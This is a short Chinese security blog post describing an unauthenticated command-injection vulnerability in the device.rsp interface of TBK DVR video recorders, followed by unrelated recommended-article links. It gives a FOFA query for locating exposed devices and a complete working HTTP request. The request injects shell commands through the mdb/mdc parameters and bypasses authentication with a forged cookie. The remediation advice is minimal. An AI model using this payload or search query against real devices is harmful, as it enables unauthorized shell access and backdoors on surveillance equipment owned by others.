TBKDVR硬盘录像机device.rsp命令执行漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

TBK DVR硬盘录像机 device.rsp 接口处存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令,写入后门文件,获取录像机shell权限。

漏洞再现

fofa:"Location: /login.rsp"
GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1

Host: ip

Cookie: uid=1

修复建议

1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。

相关推荐
为思念酝酿的痛7 小时前
POSIX信号量
linux·运维·服务器·后端
ccddsdsdfsdf7 小时前
DBeaver怎么链接mongoDB
数据库·mongodb
ylscode7 小时前
PureLogs 信息窃取恶意软件惊现高危变种:借道 MsBuild.exe 进程空心化实施无痕攻击
网络·安全·安全威胁分析
IPHWT 零软网络7 小时前
MX60E-A信创级智能语音网关技术实现与架构分析
网络·网络安全·国产自研·技术实现·智能语音网关·政企通信·信创技术
云安全助手7 小时前
2026年企业级Claude中转服务深度评测:安全、稳定与速度的终极答案
人工智能·安全·claude·ai大模型
隔窗听雨眠8 小时前
Nginx网关响应慢排查手记
java·服务器·nginx
丷丩8 小时前
Postgresql基础实践教程(十一)各种Join
数据库·postgresql·join
IT大白鼠8 小时前
RSTP协议原理与配置详解:快速生成树技术的深度解析
网络·网络协议
星夜夏空998 小时前
FreeRTOS学习(4)——内存映射
数据库·学习·mongodb
人还是要有梦想的8 小时前
linux下用搜狗输入法,中英文切换
linux·运维·服务器